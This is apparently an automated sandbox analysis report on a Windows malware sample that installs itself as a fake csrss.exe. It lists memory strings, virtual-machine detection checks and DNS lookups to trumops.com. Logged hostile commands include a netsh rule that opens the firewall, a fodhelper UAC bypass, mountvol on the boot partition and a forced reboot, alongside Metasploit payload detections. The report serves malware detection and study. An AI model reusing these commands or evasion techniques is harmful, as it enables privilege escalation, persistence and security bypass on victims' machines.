ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad Pq valuebad Ta valuebad Tc valuebad Td valuebad Th valuebad Tq valuebad flushGenbad g statusbad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegc
Source: 4t4y4r89UZ.exe, 00000000.00000002.293844995.0000000004C28000.00000040.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.320126645.0000000004BB5000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.553003907.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.364381433.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.393120243.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000022.00000002.387543295.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp Binary or memory string: \\.\HGFS`
Source: svchost.exe, 00000002.00000002.546816375.00000286A1040000.00000004.00000001.sdmp, svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.547367148.0000019AEA429000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: csrss.exe Binary or memory string: EndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*
Source: csrss.exe Binary or memory string: ypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ... H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm.we
Source: csrss.exe Binary or memory string: llocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327623272.00000000160D8000.00000004.00000001.sdmp Binary or memory string: vmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exespoolsv.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exe4t4y4r89uz.exevmsrvc.exevmusrvc.exevpc-s3vpcuhub$
Source: csrss.exe Binary or memory string: releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327631474.00000000160DE000.00000004.00000001.sdmp Binary or memory string: wtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exemsvmmoufShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exesmartscreen.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSystemSettingsBroker.exesystemsettingsbroker.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exeTrustedInstaller.exetrustedinstaller.exe4t4y4r89UZ.exexenevtchn`'
Source: csrss.exe Binary or memory string: mAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup %+v m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6cha
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_32.dll of size (targetpc= ErrCode=%v a.npages= b.npages= bytes ...
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: NonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp Binary or memory string: tvmhgfsQ
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6chancoldcooldampdarkdatadatedawndeaddialdustermsetagfailfilefirefrogfromftpsfuncgziphazehillholyhosthourhttpicmpidleigmpint8jpegjsonkindlakelateleaflinklongmoonnonenullopenpathpinepipepondpop3quitrainreadsbrkseeksid=smtpsnowsse2sse3starsurftag:tcp4tcp6texttreetruetypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ...
Source: svchost.exe, 00000002.00000002.546609399.00000286A1002000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: vmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exe@
Source: csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp Binary or memory string: yvmciwavewildwB
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327623272.00000000160D8000.00000004.00000001.sdmp Binary or memory string: svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exexensvcxenvdb$
Source: csrss.exe, 00000022.00000002.388262330.0000000005700000.00000040.00000001.sdmp Binary or memory string: +x@Y}main.isRunningInsideVMWare
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: vmsrvc.exesvchost.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesihost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exectfmon.exevmsrvc.exevmusrvc.exeexplorer.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exeSearchUI.exesearchui.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeHxTsr.exehxtsr.exe$
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: DSA-SHA1DecemberDefenderDeleteDCDuployanEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneJavaneseKatakanaKayah_LiLinear_ALinear_BLocationLsaCloseMahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexaddress bad instcgocheckcs darknessdefault:delicatednsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp exporterfinishedfragrantfs go1.13.3gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwuauservyuio.top (forced) blocked= defersc= in use)
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: sharedintapp.exe[system process]vmsrvc.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: CoCreateInstanceConnectServerkernel32.dllGetUserDefaultLCIDoleaut32.dllExecQuerySysAllocStringLenShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exefontdrvhost.exevgauthservice.exefontdrvhost.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exedwm.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeMemory Compressionmemory compressionvgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevmmemctlvmusbmousevmx_svga\\.\HGFS\\.\vmci[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exesmartscreen.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSystemSettingsBroker.exesystemsettingsbroker.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exeTrustedInstaller.exetrustedinstaller.exe4t4y4r89UZ.exe[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionTrustedInstaller.exetrustedinstaller.exe4t4y4r89UZ.exe[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compression

Anti Debugging:

Enables debug privileges
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process token adjusted: Debug
Source: C:\Windows\rss\csrss.exe Process token adjusted: Debug
Source: C:\Windows\rss\csrss.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Performs DNS TXT record lookups
Source: Traffic DNS traffic detected: queries for: trumops.com
Source: Traffic DNS traffic detected: queries for: logs.trumops.com
Source: Traffic DNS traffic detected: queries for: f7873597-7b36-4441-9416-097456f134ae.uuid.trumops.com
Source: Traffic DNS traffic detected: queries for: e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe /305-305
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
Source: C:\Windows\rss\csrss.exe Process created: unknown unknown
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: svchost.exe, 00000006.00000002.547446418.0000021170F90000.00000002.00020000.sdmp, csrss.exe, 0000000E.00000002.552647064.0000000003A60000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: svchost.exe, 00000006.00000002.547446418.0000021170F90000.00000002.00020000.sdmp, csrss.exe, 0000000E.00000002.552647064.0000000003A60000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000006.00000002.547446418.0000021170F90000.00000002.00020000.sdmp, csrss.exe, 0000000E.00000002.552647064.0000000003A60000.00000002.00020000.sdmp Binary or memory string: Progman
Source: svchost.exe, 00000006.00000002.547446418.0000021170F90000.00000002.00020000.sdmp, csrss.exe, 0000000E.00000002.552647064.0000000003A60000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Modifies the windows firewall
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
AV process strings found (often used to terminate AV products)
Source: svchost.exe, 00000008.00000002.547493168.000002364BB02000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000008.00000002.546789573.000002364BA13000.00000004.00000001.sdmp Binary or memory string: \MsMpeng.exe

Remote Access Functionality:

Yara detected Metasploit Payload
Source: Yara match File source: 16.2.csrss.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 50.2.csrss.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.csrss.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.4t4y4r89UZ.exe.4fd0e50.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.csrss.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.csrss.exe.5700e50.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 50.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.csrss.exe.5700e50.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.csrss.exe.5700e50.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.4t4y4r89UZ.exe.4fd0e50.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 50.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.csrss.exe.5700e50.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.4t4y4r89UZ.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.csrss.exe.5700e50.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4t4y4r89UZ.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.csrss.exe.5700e50.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.csrss.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.csrss.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.4t4y4r89UZ.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.csrss.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.csrss.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4t4y4r89UZ.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.csrss.exe.5700e50.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 50.2.csrss.exe.5700e50.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.csrss.exe.5700e50.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4t4y4r89UZ.exe.5040e50.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.csrss.exe.5700e50.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.4t4y4r89UZ.exe.5880000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.csrss.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.csrss.exe.5700e50.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4t4y4r89UZ.exe.5040e50.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.csrss.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 50.2.csrss.exe.5700e50.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.4t4y4r89UZ.exe.58f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.376433226.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.393407437.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.327032138.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.354921763.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000002.398055163.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.333119737.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.358520385.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.554614867.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.364603703.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.388262330.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.365686923.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000002.402547208.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.387983179.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.295699517.0000000005040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.291152945.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.377614000.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.393659101.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.321014783.0000000004FD0000.00000040.00000001.sdmp, type: MEMORY